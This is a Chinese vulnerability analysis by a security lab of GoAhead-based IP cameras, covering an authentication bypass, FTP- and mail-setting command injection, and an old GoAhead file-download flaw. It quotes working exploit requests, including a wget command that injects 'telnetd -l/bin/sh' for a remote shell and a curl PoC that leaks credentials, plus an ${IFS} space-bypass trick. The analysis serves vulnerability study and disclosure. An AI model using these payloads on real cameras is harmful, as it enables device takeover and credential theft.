安全研究 - 知道创宇

抓住“新代码”的影子 —— 基于GoAhead系列网络摄像头多个漏洞分析

2017-03-21

Author ：知道创宇404安全实验室

Date：2017年03月19日 （注：本文首发自 paper.seebug.org）

PDF 版本下载：抓住“新代码”的影子 —— 基于GoAhead系列网络摄像头多个漏洞分析

一、漏洞背景

GoAhead作为世界上最受欢迎的嵌入式Web服务器被部署在数亿台设备中，是各种嵌入式设备与应用的理想选择。当然，各厂商也会根据不同产品需求对其进行一定程度的二次开发。

2017年3月7日，Seebug漏洞平台收录了一篇基于GoAhead系列摄像头的多个漏洞。事件源于Pierre Kim在博客上发表的一篇文章，披露了存在于1250多个摄像头型号的多个通用型漏洞。作者在文章中将其中一个验证绕过漏洞归类为GoAhead服务器漏洞，但事后证明，该漏洞却是由厂商二次开发GoAhead服务器产生。于此同时，Pierre Kim将其中两个漏洞组合使用，成功获取了摄像头的最高权限。

二、漏洞分析

当我们开始着手分析这些漏洞时发现GoAhead官方源码不存在该漏洞，解开的更新固件无法找到对应程序，一系列困难接踵而至。好在根据该漏洞特殊变量名称loginuse和loginpas，我们在github上找到一个上个月还在修改的门铃项目。抓着这个“新代码”的影子，我们不仅分析出了漏洞原理，还通过分析结果找到了关于此漏洞的新的利用方式。

由于该项目依赖的一些外部环境导致无法正常编译，我们仅仅通过静态代码分析得出结论，因此难免有所疏漏。如有错误，欢迎指正。:)

1. 验证绕过导致的信息（登录凭据）泄漏漏洞

作者给出POC: curl http://ip:port/system.ini?loginuse&loginpas

1	作者给出POC: curl http://ip:port/system.ini?loginuse&loginpas

根据作者给出的POC，我们进行了如下测试：

可以看出，只要url中含有loginuse和loginpas这两个值即无需验证。甚至当这两个值对应的账号密码为空或者为错误的zzzzzzzzzzzzzz时均可通过验证。

看到这里，我们大致可以判断出验证loginuse和loginpas的逻辑问题导致该漏洞的出现。于是，在此门铃项目中直接搜索loginuse定位到关键函数。

/func/ieparam.c第6407-6485行AdjustUserPri函数如下：

unsigned char AdjustUserPri( char* url )  
{
    int        iRet;
    int        iRet1;
    unsigned char     byPri = 0;
    char        loginuse[32];
    char        loginpas[32];
    char        decoderbuf[128];
    char        temp2[128];
    memset( loginuse, 0x00, 32 );
    memset( loginpas, 0x00, 32 );
    memset( temp2, 0x00, 128 );
    iRet = GetStrParamValue( url, "loginuse", temp2, 31 );
//判断是否存在loginuse值，并将获取到的值赋给temp2
    if ( iRet == 0x00 )
    {
        memset( decoderbuf, 0x00, 128 );
        URLDecode( temp2, strlen( temp2 ), decoderbuf, 15 );
        memset( loginuse, 0x00, 31 );
        strcpy( loginuse, decoderbuf );
    }
//如果存在，则将temp2复制到loginuse数组中
    memset( temp2, 0x00, 128 );
    iRet1 = GetStrParamValue( url, "loginpas", temp2, 31 );
//判断是否存在loginpas值，并将获取到的值赋给temp2
    if ( iRet1 == 0x00 )
    {
        memset( decoderbuf, 0x00, 128 );
        URLDecode( temp2, strlen( temp2 ), decoderbuf, 15 );
        memset( loginpas, 0x00, 31 );
        strcpy( loginpas, decoderbuf );
    }
//如果存在，则将temp2复制到loginpas数组中
    if ( iRet == 0 )
    {
        if ( iRet1 == 0x00 )
        {
            //printf("user %s pwd:%s\n",loginuse,loginpas);
            byPri = GetUserPri( loginuse, loginpas );
//如果两次都获取到了对应的值，则通过GetUserPri进行验证。
            return byPri;
        }
    }

    memset( loginuse, 0x00, 32 );
    memset( loginpas, 0x00, 32 );
    memset( temp2, 0x00, 128 );
    iRet = GetStrParamValue( url, "user", temp2, 31 );

    if ( iRet == 0x00 )
    {
        memset( decoderbuf, 0x00, 128 );
        URLDecode( temp2, strlen( temp2 ), decoderbuf, 15 );
        memset( loginuse, 0x00, 31 );
        strcpy( loginuse, decoderbuf );
    }

    memset( temp2, 0x00, 128 );
    iRet1 = GetStrParamValue( url, "pwd", temp2, 31 );

    if ( iRet1 == 0x00 )
    {
        memset( decoderbuf, 0x00, 128 );
        URLDecode( temp2, strlen( temp2 ), decoderbuf, 15 );
        memset( loginpas, 0x00, 31 );
        strcpy( loginpas, decoderbuf );
    }

    if ( iRet == 0 )
    {
        if ( iRet1 == 0x00 )
        {
            //printf("user %s pwd:%s\n",loginuse,loginpas);
            byPri = GetUserPri( loginuse, loginpas );
            return byPri;
        }
    }
//获取user和pwd参数，逻辑结构与上方的loginuse和loginpas相同。
    return byPri;
}

unsigned char AdjustUserPri( char* url )

{

int iRet;

int iRet1;

unsigned char byPri = 0;

char loginuse[32];

char loginpas[32];

char decoderbuf[128];

char temp2[128];

memset( loginuse, 0x00, 32 );

memset( loginpas, 0x00, 32 );

memset( temp2, 0x00, 128 );

iRet = GetStrParamValue( url, "loginuse", temp2, 31 );

//判断是否存在loginuse值，并将获取到的值赋给temp2

if ( iRet == 0x00 )

{

memset( decoderbuf, 0x00, 128 );

URLDecode( temp2, strlen( temp2 ), decoderbuf, 15 );

memset( loginuse, 0x00, 31 );

strcpy( loginuse, decoderbuf );

}

//如果存在，则将temp2复制到loginuse数组中

memset( temp2, 0x00, 128 );

iRet1 = GetStrParamValue( url, "loginpas", temp2, 31 );

//判断是否存在loginpas值，并将获取到的值赋给temp2

if ( iRet1 == 0x00 )

{

memset( decoderbuf, 0x00, 128 );

URLDecode( temp2, strlen( temp2 ), decoderbuf, 15 );

memset( loginpas, 0x00, 31 );

strcpy( loginpas, decoderbuf );

}

//如果存在，则将temp2复制到loginpas数组中

if ( iRet == 0 )

{

if ( iRet1 == 0x00 )

{

//printf("user %s pwd:%s\n",loginuse,loginpas);

byPri = GetUserPri( loginuse, loginpas );

//如果两次都获取到了对应的值，则通过GetUserPri进行验证。

return byPri;

}

memset( loginuse, 0x00, 32 );

memset( loginpas, 0x00, 32 );

memset( temp2, 0x00, 128 );

iRet = GetStrParamValue( url, "user", temp2, 31 );

if ( iRet == 0x00 )

{

memset( decoderbuf, 0x00, 128 );

URLDecode( temp2, strlen( temp2 ), decoderbuf, 15 );

memset( loginuse, 0x00, 31 );

strcpy( loginuse, decoderbuf );

}

memset( temp2, 0x00, 128 );

iRet1 = GetStrParamValue( url, "pwd", temp2, 31 );

if ( iRet1 == 0x00 )

{

memset( decoderbuf, 0x00, 128 );

URLDecode( temp2, strlen( temp2 ), decoderbuf, 15 );

memset( loginpas, 0x00, 31 );

strcpy( loginpas, decoderbuf );

}

if ( iRet == 0 )

{

if ( iRet1 == 0x00 )

{

//printf("user %s pwd:%s\n",loginuse,loginpas);

byPri = GetUserPri( loginuse, loginpas );

return byPri;

}

//获取user和pwd参数，逻辑结构与上方的loginuse和loginpas相同。

return byPri;

}

我们对其中步骤做了注释，根据这段逻辑，我们先通过GetStrParamValue()获取loginuse和loginpas对应值，然后将获取值通过GetUserPri()函数进行验证。跟进GetStrParamValue()这个函数，我们发现了更奇怪的事情。command/cmd_thread.c中第13-51行GetStrParamValue()函数如下：

//结合上面代码中的iRet = GetStrParamValue( url, "loginuse", temp2, 31 );审视这段代码
int GetStrParamValue( const char* pszSrc, const char* pszParamName, char* pszParamValue )  
{
    const char* pos1, *pos = pszSrc;
    unsigned char       len = 0;

    if ( !pszSrc || !pszParamName )
    {
        return -1;
    }
//判断url和需要查找的变量loginuse是否存在

    pos1 = strstr( pos, pszParamName );

    if ( !pos1 )
    {
        return -1;
    }
//由于url中含有loginuse，所以这里pos1可以取到对应的值，故不进入if(!pos1)

    pos = pos1 + strlen( pszParamName ) + 1;
    pos1 = strstr( pos, "&" );

    if ( pos1 )
    {
        memcpy( pszParamValue, pos, pos1 - pos );
//根据正常情况loginuse=admin&loginpas=xxx,这一段代码的逻辑是从loginuse后一位也就是等于号开始取值直到&号作为loginuse对应的值。
//根据作者的POC:loginuse&loginpas，最终这里pos应该位于pos1后一位，所以pos1-pos = -1
//memcpy( pszParamValue, pos, -1 );无法运行成功。
        len = pos1 - pos;
    }

    else
    {
        pos1 = strstr( pos, " " );

        if ( pos1 != NULL )
        {
            memcpy( pszParamValue, pos, pos1 - pos );
            len = pos1 - pos;
        }
    }
    return 0;
//不论上述到底如何取值，最终都可以返回0
}

//结合上面代码中的iRet = GetStrParamValue( url, "loginuse", temp2, 31 );审视这段代码

int GetStrParamValue( const char* pszSrc, const char* pszParamName, char* pszParamValue )

{

const char* pos1, *pos = pszSrc;

unsigned char len = 0;

if ( !pszSrc || !pszParamName )

{

return -1;

}

//判断url和需要查找的变量loginuse是否存在

pos1 = strstr( pos, pszParamName );

if ( !pos1 )

{

return -1;

}

//由于url中含有loginuse，所以这里pos1可以取到对应的值，故不进入if(!pos1)

pos = pos1 + strlen( pszParamName ) + 1;

pos1 = strstr( pos, "&" );

if ( pos1 )

{

memcpy( pszParamValue, pos, pos1 - pos );

//根据正常情况loginuse=admin&loginpas=xxx,这一段代码的逻辑是从loginuse后一位也就是等于号开始取值直到&号作为loginuse对应的值。

//根据作者的POC:loginuse&loginpas，最终这里pos应该位于pos1后一位，所以pos1-pos = -1

//memcpy( pszParamValue, pos, -1 );无法运行成功。

len = pos1 - pos;

}

else

{

pos1 = strstr( pos, " " );

if ( pos1 != NULL )

{

memcpy( pszParamValue, pos, pos1 - pos );

len = pos1 - pos;

}

return 0;

//不论上述到底如何取值，最终都可以返回0

}

根据作者给出的PoC，在memcpy()函数处会导致崩溃，但事实上，我们的web服务器正常运行并返回system.ini具体内容。这一点令我们百思不得其解。当我们对AdjustUserPri()函数向上溯源时终于弄清楚是上层代码问题导致代码根本无法运行到这里，所以也不会导致崩溃。 func/ieparam.c文件第7514-7543行调用了AdjustUserPri()函数：

if ( auth == 0x00 )  
{
    char temp[512];
    int  wlen = 0;

    if ( len )
    {
        return 0;
    }

    #if 0
    byPri = AdjustUserPri( url );

    printf("url:%s byPri %d\n",url,byPri);
    if ( byPri == 0x00 )
    {
        memset( temp, 0x00, 512 );
        wlen += sprintf( temp + wlen, "var result=\"Auth Failed\";\r\n" );
        memcpy( pbuf, temp, wlen );
        return wlen;
    }
    #else
    byPri = 255;
    #endif
}

else  
{
    byPri = pri;
}

if ( auth == 0x00 )

{

char temp[512];

int wlen = 0;

if ( len )

{

return 0;

}

#if 0

byPri = AdjustUserPri( url );

printf("url:%s byPri %d\n",url,byPri);

if ( byPri == 0x00 )

{

memset( temp, 0x00, 512 );

wlen += sprintf( temp + wlen, "var result=\"Auth Failed\";\r\n" );

memcpy( pbuf, temp, wlen );

return wlen;

}

#else

byPri = 255;

#endif

}

else

{

byPri = pri;

}

在之前跟GetUserPri()函数时有一行注释：//result:0->error user or passwd error 1->vistor 2->opration 255->admin。当我们回头再看这段函数时，可以发现开发者直接将验证部分注释掉，byPri被直接赋值为255，这就意味着只要进入这段逻辑，用户权限就直接是管理员了。这里已经可以解释本小节开篇进行的测试，也就是为什么我们输入空的用户名和密码或者错误的用户名和密码也可以通过验证。

很遗憾，我们没有继续向上溯源找到这里的auth这个值到底是如何而来。不过根据这里的代码逻辑，我们可以猜测，当auth为0时，通过GET请求中的参数验证用户名密码。当auth不为0时，通过HTTP摘要验证方式来验证用户名密码。

再看一遍上方代码，GET请求中含有参数loginuse和loginpas就直接可以通过验证。那么AdjustUserPri()函数中另外两个具有相同逻辑的参数user和pwd呢?

成功抓住"新代码"的影子。

2. 远程命令执行漏洞一（需登录）

作者给出的exp如下:

user@kali$ wget -qO- 'http://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'  
user@kali$ wget -qO- 'http://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin'

user@kali$ wget -qO- 'http://192.168.1.107/set_ftp.cgi?next_url=ftp.htm&loginuse=admin&loginpas=admin&svr=192.168.1.1&port=21&user=ftp&pwd=$(telnetd -p25 -l/bin/sh)&dir=/&mode=PORT&upload_interval=0'

user@kali$ wget -qO- 'http://192.168.1.107/ftptest.cgi?next_url=test_ftp.htm&loginuse=admin&loginpas=admin'

可以看到，该exp分为两步，第一步先设置ftp各种参数，第二步按照第一步设置的各参数测试ftp链接，同时导致我们在第一步设置的命令被执行。

我们在func/ieparam.c文件中找到了set_ftp.cgi和ftptest.cgi的调用过程：

383:    pdst = strstr( pcmd, "ftptest.cgi" );  
384:  
385:    if ( pdst != NULL )  
386:    {  
387:        return CGI_IESET_FTPTEST;  
388:    }

455:    pdst = strstr( pcmd, "set_ftp.cgi" );  
456:  
457:    if ( pdst != NULL )  
458:    {  
459:        return CGI_IESET_FTP;  
460:    }

7658:   case CGI_IESET_FTPTEST:  
7659:       if ( len == 0x00 )  
7660:       {  
7661:           iRet = cgisetftptest( pbuf, pparam, byPri );  
7662:       }

7756:   case CGI_IESET_FTP:  
7757:       if ( len == 0x00 )  
7758:       {  
7759:           iRet = cgisetftp( pbuf, pparam, byPri );  
7760:           NoteSaveSem();  
7761:       }

383: pdst = strstr( pcmd, "ftptest.cgi" );

384:

385: if ( pdst != NULL )

386: {

387: return CGI_IESET_FTPTEST;

388: }

455: pdst = strstr( pcmd, "set_ftp.cgi" );

456:

457: if ( pdst != NULL )

458: {

459: return CGI_IESET_FTP;

460: }

7658: case CGI_IESET_FTPTEST:

7659: if ( len == 0x00 )

7660: {

7661: iRet = cgisetftptest( pbuf, pparam, byPri );

7662: }

7756: case CGI_IESET_FTP:

7757: if ( len == 0x00 )

7758: {

7759: iRet = cgisetftp( pbuf, pparam, byPri );

7760: NoteSaveSem();

7761: }

首先跟踪cgisetftp( pbuf, pparam, byPri );这个函数，我们发现，该函数仅仅是获取到我们请求的参数并将参数赋值给结构体中的各个变量。关键代码如下：

//这部分代码可以不做细看，下一步我们进行ftp测试连接的时候对照该部分寻找对应的值就可以了。
    iRet = GetStrParamValue( pparam, "svr", temp2, 63 );
    URLDecode( temp2, strlen( temp2 ), decoderbuf, 63 );
    strcpy( bparam.stFtpParam.szFtpSvr, decoderbuf );

    GetIntParamValue( pparam, "port", &iValue );
    bparam.stFtpParam.nFtpPort = iValue;

    iRet = GetStrParamValue( pparam, "user", temp2, 31 );
    URLDecode( temp2, strlen( temp2 ), decoderbuf, 31 );
    strcpy( bparam.stFtpParam.szFtpUser, decoderbuf );

    memset( temp2, 0x00, 64 );
    iRet = GetStrParamValue( pparam, "pwd", temp2, 31 );
    URLDecode( temp2, strlen( temp2 ), decoderbuf, 31 );
    strcpy( bparam.stFtpParam.szFtpPwd, decoderbuf );
//我们构造的命名被赋值给了参数bparam.stFtpParam.szFtpPwd
    iRet = GetStrParamValue( pparam, "dir", temp2, 31 );
    URLDecode( temp2, strlen( temp2 ), decoderbuf, 31 );
    strcpy( bparam.stFtpParam.szFtpDir, decoderbuf );
    if(decoderbuf[0] == 0)
    {
        strcpy(bparam.stFtpParam.szFtpDir, "/" );
    }

    GetIntParamValue( pparam, "mode", &iValue );
    bparam.stFtpParam.byMode = iValue;
    GetIntParamValue( pparam, "upload_interval", &iValue );
    bparam.stFtpParam.nInterTime = iValue;

    iRet = GetStrParamValue( pparam, "filename", temp1, 63 );
    URLDecode( temp2, strlen( temp2 ), decoderbuf, 63 );
    strcpy( bparam.stFtpParam.szFileName, decoderbuf );

//这部分代码可以不做细看，下一步我们进行ftp测试连接的时候对照该部分寻找对应的值就可以了。

iRet = GetStrParamValue( pparam, "svr", temp2, 63 );

URLDecode( temp2, strlen( temp2 ), decoderbuf, 63 );

strcpy( bparam.stFtpParam.szFtpSvr, decoderbuf );

GetIntParamValue( pparam, "port", &iValue );

bparam.stFtpParam.nFtpPort = iValue;

iRet = GetStrParamValue( pparam, "user", temp2, 31 );

URLDecode( temp2, strlen( temp2 ), decoderbuf, 31 );

strcpy( bparam.stFtpParam.szFtpUser, decoderbuf );

memset( temp2, 0x00, 64 );

iRet = GetStrParamValue( pparam, "pwd", temp2, 31 );

URLDecode( temp2, strlen( temp2 ), decoderbuf, 31 );

strcpy( bparam.stFtpParam.szFtpPwd, decoderbuf );

//我们构造的命名被赋值给了参数bparam.stFtpParam.szFtpPwd

iRet = GetStrParamValue( pparam, "dir", temp2, 31 );

URLDecode( temp2, strlen( temp2 ), decoderbuf, 31 );

strcpy( bparam.stFtpParam.szFtpDir, decoderbuf );

if(decoderbuf[0] == 0)

{

strcpy(bparam.stFtpParam.szFtpDir, "/" );

}

GetIntParamValue( pparam, "mode", &iValue );

bparam.stFtpParam.byMode = iValue;

GetIntParamValue( pparam, "upload_interval", &iValue );

bparam.stFtpParam.nInterTime = iValue;

iRet = GetStrParamValue( pparam, "filename", temp1, 63 );

URLDecode( temp2, strlen( temp2 ), decoderbuf, 63 );

strcpy( bparam.stFtpParam.szFileName, decoderbuf );

综上所述，set_ftp.cgi仅仅是将我们请求的各参数写入全局变量中。接下来是ftptest.cgi部分，也就是调用了iRet = cgisetftptest( pbuf, pparam, byPri );这个函数。在该函数中，最为关键的函数为DoFtpTest();。直接跳到func/ftp.c文件中找到函数DoFtpTest()：

int DoFtpTest( void )  
{
    int     iRet = 0;
    iRet = FtpConfig( 0x01, NULL );

    if ( iRet == 0 )
    {
        char cmd[128];
        memset(cmd, 0, 128);
        sprintf(cmd, "/tmp/ftpupdate1.sh > %s", FILE_FTP_TEST_RESULT);
        iRet = DoSystem(cmd);
        //iRet = DoSystem( "/tmp/ftpupdate1.sh > /tmp/ftpret.txt" );
    }

    return iRet;
}

int DoFtpTest( void )

{

int iRet = 0;

iRet = FtpConfig( 0x01, NULL );

if ( iRet == 0 )

{

char cmd[128];

memset(cmd, 0, 128);

sprintf(cmd, "/tmp/ftpupdate1.sh > %s", FILE_FTP_TEST_RESULT);

iRet = DoSystem(cmd);

//iRet = DoSystem( "/tmp/ftpupdate1.sh > /tmp/ftpret.txt" );

}

return iRet;

}

可以看到，执行 FtpConfig()函数后运行了/tmp/ftpupdate1.sh。我们先看 FtpConfig()函数如何处理该问题：

int FtpConfig( char test, char* filename )  
{
......
    fp = fopen( "/tmp/ftpupdate1.sh", "wb" );

    memset( cmd, 0x00, 128 );
    sprintf( cmd, "/system/system/bin/ftp -n<<!\n" );
    fwrite( cmd, 1, strlen( cmd ), fp );
    memset( cmd, 0x00, 128 );
    sprintf( cmd, "open %s %d\n", bparam.stFtpParam.szFtpSvr, bparam.stFtpParam.nFtpPort );
    fwrite( cmd, 1, strlen( cmd ), fp );
    memset( cmd, 0x00, 128 );
    sprintf( cmd, "user %s %s\n", bparam.stFtpParam.szFtpUser, bparam.stFtpParam.szFtpPwd );
    fwrite( cmd, 1, strlen( cmd ), fp );
    memset( cmd, 0x00, 128 );
    sprintf( cmd, "binary\n" );
    fwrite( cmd, 1, strlen( cmd ), fp );

    if ( bparam.stFtpParam.byMode == 1 )     //passive
    {
        memset( cmd, 0x00, 128 );
        sprintf( cmd, "pass\n" );
        fwrite( cmd, 1, strlen( cmd ), fp );
    }
#ifdef CUSTOM_DIR

    char sub_temp[ 128 ];
    memset(sub_temp, 0, 128);
    //strcpy(sub_temp, bparam.stFtpParam.szFtpDir);
    sprintf(sub_temp, "%s/%s", bparam.stFtpParam.szFtpDir,bparam.stIEBaseParam.dwDeviceID); 

    flag = sub_dir(fp,sub_temp);
    if(flag){
        memset( cmd, 0x00, 128 );
        sprintf( cmd, "cd %s\n", bparam.stFtpParam.szFtpDir );
        fwrite( cmd, 1, strlen( cmd ), fp );
    }
#else
    memset( cmd, 0x00, 128 );
    sprintf( cmd, "cd %s\n", bparam.stFtpParam.szFtpDir );
    fwrite( cmd, 1, strlen( cmd ), fp );

#endif
    memset( cmd, 0x00, 128 );
    sprintf( cmd, "lcd /tmp\n" );
    fwrite( cmd, 1, strlen( cmd ), fp );

    if ( test == 0x01 )
    {
        FtpFileTest();
        memset( cmd, 0x00, 128 );
        sprintf( cmd, "put ftptest.txt\n" );
        fwrite( cmd, 1, strlen( cmd ), fp );
    }

    else
    {
        char    filename1[128];
        memset( filename1, 0x00, 128 );
        memcpy( filename1, filename + 5, strlen( filename ) - 5 );
        memset( cmd, 0x00, 128 );
        sprintf( cmd, "put %s\n", filename1 );
        fwrite( cmd, 1, strlen( cmd ), fp );
    }

    memset( cmd, 0x00, 128 );
    sprintf( cmd, "close\n" );
    fwrite( cmd, 1, strlen( cmd ), fp );
    memset( cmd, 0x00, 128 );
    sprintf( cmd, "bye\n" );
    fwrite( cmd, 1, strlen( cmd ), fp );
    memset( cmd, 0x00, 128 );
    sprintf( cmd, "!\n" );
    fwrite( cmd, 1, strlen( cmd ), fp );
    fclose( fp );
    iRet = access( "/tmp/ftpupdate1.sh", X_OK );

    if ( iRet )
    {
        DoSystem( "chmod a+x /tmp/ftpupdate1.sh" );
    }

    return 0;
}

int FtpConfig( char test, char* filename )

{

......

fp = fopen( "/tmp/ftpupdate1.sh", "wb" );

memset( cmd, 0x00, 128 );

sprintf( cmd, "/system/system/bin/ftp -n<<!\n" );

fwrite( cmd, 1, strlen( cmd ), fp );

memset( cmd, 0x00, 128 );

sprintf( cmd, "open %s %d\n", bparam.stFtpParam.szFtpSvr, bparam.stFtpParam.nFtpPort );

fwrite( cmd, 1, strlen( cmd ), fp );

memset( cmd, 0x00, 128 );

sprintf( cmd, "user %s %s\n", bparam.stFtpParam.szFtpUser, bparam.stFtpParam.szFtpPwd );

fwrite( cmd, 1, strlen( cmd ), fp );

memset( cmd, 0x00, 128 );

sprintf( cmd, "binary\n" );

fwrite( cmd, 1, strlen( cmd ), fp );

if ( bparam.stFtpParam.byMode == 1 ) //passive

{

memset( cmd, 0x00, 128 );

sprintf( cmd, "pass\n" );

fwrite( cmd, 1, strlen( cmd ), fp );

}

#ifdef CUSTOM_DIR

char sub_temp[ 128 ];

memset(sub_temp, 0, 128);

//strcpy(sub_temp, bparam.stFtpParam.szFtpDir);

sprintf(sub_temp, "%s/%s", bparam.stFtpParam.szFtpDir,bparam.stIEBaseParam.dwDeviceID);

flag = sub_dir(fp,sub_temp);

if(flag){

memset( cmd, 0x00, 128 );

sprintf( cmd, "cd %s\n", bparam.stFtpParam.szFtpDir );

fwrite( cmd, 1, strlen( cmd ), fp );

}

#else

memset( cmd, 0x00, 128 );

sprintf( cmd, "cd %s\n", bparam.stFtpParam.szFtpDir );

fwrite( cmd, 1, strlen( cmd ), fp );

#endif

memset( cmd, 0x00, 128 );

sprintf( cmd, "lcd /tmp\n" );

fwrite( cmd, 1, strlen( cmd ), fp );

if ( test == 0x01 )

{

FtpFileTest();

memset( cmd, 0x00, 128 );

sprintf( cmd, "put ftptest.txt\n" );

fwrite( cmd, 1, strlen( cmd ), fp );

}

else

{

char filename1[128];

memset( filename1, 0x00, 128 );

memcpy( filename1, filename + 5, strlen( filename ) - 5 );

memset( cmd, 0x00, 128 );

sprintf( cmd, "put %s\n", filename1 );

fwrite( cmd, 1, strlen( cmd ), fp );

}

memset( cmd, 0x00, 128 );

sprintf( cmd, "close\n" );

fwrite( cmd, 1, strlen( cmd ), fp );

memset( cmd, 0x00, 128 );

sprintf( cmd, "bye\n" );

fwrite( cmd, 1, strlen( cmd ), fp );

memset( cmd, 0x00, 128 );

sprintf( cmd, "!\n" );

fwrite( cmd, 1, strlen( cmd ), fp );

fclose( fp );

iRet = access( "/tmp/ftpupdate1.sh", X_OK );

if ( iRet )

{

DoSystem( "chmod a+x /tmp/ftpupdate1.sh" );

}

return 0;

}

至此，逻辑很清晰了。在FtpConfig()函数中，将我们之前在设置的时候输入的各个值写入了/tmp/ftpupdate1.sh中，然后在DoFtpTest()中运行该脚本，导致最后的命令执行。这一点，同样可以在漏洞作者原文中得到证明：

作者原文中展示的/tmp/ftpupload.sh:
/ # cat /tmp/ftpupload.sh 
/bin/ftp -n<<!
open 192.168.1.1 21  
user ftp $(telnetd -l /bin/sh -p 25)ftp  
binary  
lcd /tmp  
put ftptest.txt  
close  
bye  
!
/ #

作者原文中展示的/tmp/ftpupload.sh:

/ # cat /tmp/ftpupload.sh

/bin/ftp -n<<!

open 192.168.1.1 21

user ftp $(telnetd -l /bin/sh -p 25)ftp

binary

lcd /tmp

put ftptest.txt

bye

/ #

实际测试中，我们发现：如果直接用作者给出的exp去尝试RCE往往无法成功运行。从http://ip:port/get_params.cgi?user=username&pwd=password可以发现，我们注入的命令在空格处被截断。

于是我们用${IFS}替换空格（还可以采用+代替空格）:

但由于有长度限制再次被截断，调整长度后最终成功执行命令：

成功抓住新代码的影子。

3. GoAhead绕过验证文件下载漏洞

2017年3月9日，Pierre Kim在文章中增加了两个链接，描述了一个GoAhead 2.1.8版本之前的任意文件下载漏洞。攻击者通过使用该漏洞，再结合一个新的远程命令执行漏洞可以再次获取摄像头的最高权限。有意思的是，这个漏洞早在2004年就已被提出并成功修复（http://aluigi.altervista.org/adv/goahead-adv2.txt）。但是由于众多摄像头仍然使用存在该漏洞的老代码，该漏洞仍然可以在众多摄像头设备中复现。

我们也查找了此门铃项目中的GoAhead服务器版本。web/release.txt前三行内容如下：

=====================================
GoAhead WebServer 2.1.8 Release Notes  
=====================================

=====================================

GoAhead WebServer 2.1.8 Release Notes

=====================================

再仔细查看websUrlHandlerRequest()内容，发现并未对该漏洞进行修复，说明该漏洞也影响这个门铃项目。以此类推，本次受影响的摄像头应该也存在这个漏洞，果不其然：

那么，具体的漏洞成因又是如何呢？让我们来跟进./web/LINUX/main.c了解该漏洞的成因。 initWebs()函数中，关键代码如下:

154:   umOpen();

157:   umAddGroup( T( "adm" ), 0x07, AM_DIGEST, FALSE, FALSE );

159:   umAddUser( admu, admp, T( "adm" ), FALSE, FALSE );  
160:   umAddUser( "admin0", "admin0", T( "adm" ), FALSE, FALSE );  
161:   umAddUser( "admin1", "admin1", T( "adm" ), FALSE, FALSE );  
162:   umAddAccessLimit( T( "/" ), AM_DIGEST, FALSE, T( "adm" ) );

224:   websUrlHandlerDefine( T( "" ), NULL, 0, websSecurityHandler, WEBS_HANDLER_FIRST );  
227:   websUrlHandlerDefine( T( "" ), NULL, 0, websDefaultHandler,WEBS_HANDLER_LAST );

154: umOpen();

157: umAddGroup( T( "adm" ), 0x07, AM_DIGEST, FALSE, FALSE );

159: umAddUser( admu, admp, T( "adm" ), FALSE, FALSE );

160: umAddUser( "admin0", "admin0", T( "adm" ), FALSE, FALSE );

161: umAddUser( "admin1", "admin1", T( "adm" ), FALSE, FALSE );

162: umAddAccessLimit( T( "/" ), AM_DIGEST, FALSE, T( "adm" ) );

224: websUrlHandlerDefine( T( "" ), NULL, 0, websSecurityHandler, WEBS_HANDLER_FIRST );

227: websUrlHandlerDefine( T( "" ), NULL, 0, websDefaultHandler,WEBS_HANDLER_LAST );

其中，150-160中um开头的函数为用户权限控制的相关函数。主要做了以下四件事情:

1. umOpen() 打开用户权限控制；
2. umAddGroup() 增加用户组adm，并设置该用户组用户使用HTTP摘要认证方式登录；
3. umAddUser() 增加用户admin,admin0,admin1,并且这三个用户均属于adm用户组；
4. umAddAccessLimit() 增加限制路径/,凡是以/开头的路径都要通过HTTP摘要认证的方式登录属于adm组的用户。

紧接着，在220多行通过websUrlHandlerDefine()函数运行了两个Handler，websSecurityHandler和websDefaultHandler。在websSecurityHandler中，对HTTP摘要认证方式进行处理。关键代码如下：

86:           accessLimit = umGetAccessLimit( path );

115:         am = umGetAccessMethodForURL( accessLimit );  
116:         nRet = 0;

118-242:  if ( ( flags & WEBS_LOCAL_REQUEST ) && ( debugSecurity == 0 ) ){……}

245:         return nRet;

86: accessLimit = umGetAccessLimit( path );

115: am = umGetAccessMethodForURL( accessLimit );

116: nRet = 0;

118-242: if ( ( flags & WEBS_LOCAL_REQUEST ) && ( debugSecurity == 0 ) ){……}

245: return nRet;

第86行，umGetAccessLimit()函数用于将我们请求的路径规范化，主要逻辑就是去除路径最后的/或者\\，确保我们请求的是一个文件。umGetAccessMethodForURL()函数用于获取我们请求的路径对应的权限。这里，我们请求的路径是system.ini。根据上文，设置需要对/路径需要进行HTTP摘要认证，由于程序判断system.ini不属于/路径，所以这里am为默认的AM_INVALID，即无需验证。

紧接着向下，nRet初始化赋值为0.在118-242行中，如果出现了账号密码错误等情况，则会将nRet赋值为1，表示验证不通过。但是由于我们请求的路径无需验证，所以判断结束时nRet仍为0。因此，顺利通过验证，获取到对应的文件内容。

就这样，我们再次抓住了这个“新代码”的影子。这个2004年的漏洞让我们不得不为新代码这三个字加上了双引号。

4. 远程命令执行漏洞二（需登录）

在Pierre Kim新增的两个链接中，还介绍了一种新的远程命令执行的方式，即通过set_mail.cgi和mailtest.cgi来执行命令。与上一个远程命令执行漏洞一样，我们先在func/ieparam.c文件中找到set_mail.cgi和mailtest.cgi的调用过程：

257:    pdst = strstr( pcmd, "set_mail.cgi" );  
258:  
259:    if ( pdst != NULL )  
260:    {  
261:        return CGI_IESET_MAIL;  
262:    }

348:    pdst = strstr( pcmd, "mailtest.cgi" );  
349:  
350:    if ( pdst != NULL )  
351:    {  
352:        return CGI_IESET_MAILTEST;  
353:}

7674:    case CGI_IESET_MAILTEST:  
7675:        if ( len == 0x00 )  
7676:        {  
7677:            iRet = cgisetmailtest( pbuf, pparam, byPri );  
7678:        }  
7679:  
7680:        break;

7746:    case CGI_IESET_MAIL:  
7747:        if ( len == 0x00 )  
7748:        {  
7749:            iRet = cgisetmail( pbuf, pparam, byPri );  
7750:            IETextout( "-------------OK--------" );  
7751:            NoteSaveSem();  
7752:        }  
7753:  
7754:        break;

257: pdst = strstr( pcmd, "set_mail.cgi" );

258:

259: if ( pdst != NULL )

260: {

261: return CGI_IESET_MAIL;

262: }

348: pdst = strstr( pcmd, "mailtest.cgi" );

349:

350: if ( pdst != NULL )

351: {

352: return CGI_IESET_MAILTEST;

353:}

7674: case CGI_IESET_MAILTEST:

7675: if ( len == 0x00 )

7676: {

7677: iRet = cgisetmailtest( pbuf, pparam, byPri );

7678: }

7679:

7680: break;

